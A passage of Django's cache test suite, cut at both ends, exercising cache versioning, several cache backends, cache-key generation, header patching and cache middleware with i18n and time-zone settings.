self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertDictEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertDictEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertDictEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertDictEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertDictEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
out = six.StringIO()
management.call_command('createcachetable', stdout=out)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
out = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=out,
)
self.assertEqual(out.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertIsNone(cache.get("key1"))
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
@override_settings(DATABASE_ROUTERS=[DBCacheRouter()])
def test_createcachetable_observes_database_router(self):
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertIsNone(caches['other'].get('value'))
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
memcached_never_expiring_params = memcached_params.copy()
memcached_never_expiring_params['TIMEOUT'] = None
memcached_far_future_params = memcached_params.copy()
memcached_far_future_params['TIMEOUT'] = 31536000 # 60*60*24*365, 1 year
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache_config in settings.CACHES.items():
if cache_config['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
@override_settings(CACHES=caches_setting_for_tests(base=memcached_never_expiring_params))
def test_default_never_expiring_timeout(self):
# Regression test for #22845
cache.set('infinite_foo', 'bar')
self.assertEqual(cache.get('infinite_foo'), 'bar')
@override_settings(CACHES=caches_setting_for_tests(base=memcached_far_future_params))
def test_default_far_future_timeout(self):
# Regression test for #22845
cache.set('future_foo', 'bar')
self.assertEqual(cache.get('future_foo'), 'bar')
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_memcached_deletes_key_on_failed_set(self):
# By default memcached allows objects up to 1MB. For the cache_db session
# backend to always use the current session, memcached needs to delete
# the old key if it fails to set.
# pylibmc doesn't seem to have SERVER_MAX_VALUE_LENGTH as far as I can
# tell from a quick check of its source code. This is falling back to
# the default value exposed by python-memcached on my system.
max_value_length = getattr(cache._lib, 'SERVER_MAX_VALUE_LENGTH', 1048576)
cache.set('small_value', 'a')
self.assertEqual(cache.get('small_value'), 'a')
large_value = 'a' * (max_value_length + 1)
cache.set('small_value', large_value)
# small_value should be deleted, or set if configured to accept larger values
value = cache.get('small_value')
self.assertTrue(value is None or value == large_value)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super(FileBasedCacheTests, self).tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(TestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
